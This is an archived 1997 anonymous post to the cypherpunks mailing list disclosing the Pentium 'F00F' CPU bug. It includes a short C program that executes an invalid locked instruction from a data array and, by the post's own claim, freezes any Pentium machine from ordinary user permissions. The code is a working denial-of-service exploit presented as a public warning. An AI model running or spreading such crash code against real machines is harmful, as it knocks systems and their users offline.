From: Anonymous <anon@anon.efga.org>
To: cypherpunks@cyberpass.net
Message Hash: f3b51626e562bda9bfb28dc86ca66f58000a987a4131322513cbdda04595411e
Message ID: <48aa69ecd4b055b2bfdf92ae0dd435b9@anon.efga.org>
Reply To: N/A
UTC Datetime: 1997-11-08 05:43:03 UTC
Raw Date: Sat, 8 Nov 1997 13:43:03 +0800
From: Anonymous <anon@anon.efga.org>
Date: Sat, 8 Nov 1997 13:43:03 +0800
To: cypherpunks@cyberpass.net
Subject: WARNING: Serious Pentium Bug
Message-ID: <48aa69ecd4b055b2bfdf92ae0dd435b9@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain
There is a SERIOUS bug in all pentium CPUs. The following
code will crash any machine running on a pentium CPU, MMX or no
MMX, any speed, regardless of OS (crash as in instant seize, hard
reboot the only cure):
char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
main ()
{
void (*f)() = x;
f();
}
This require no special permissions to run, it works fine with
average-joe-userspace permissions. I have verified this, it works.
Demand a new CPU from Intel.
Return to November 1997
Return to “Ray Arachelian <sunder@brainlink.com>”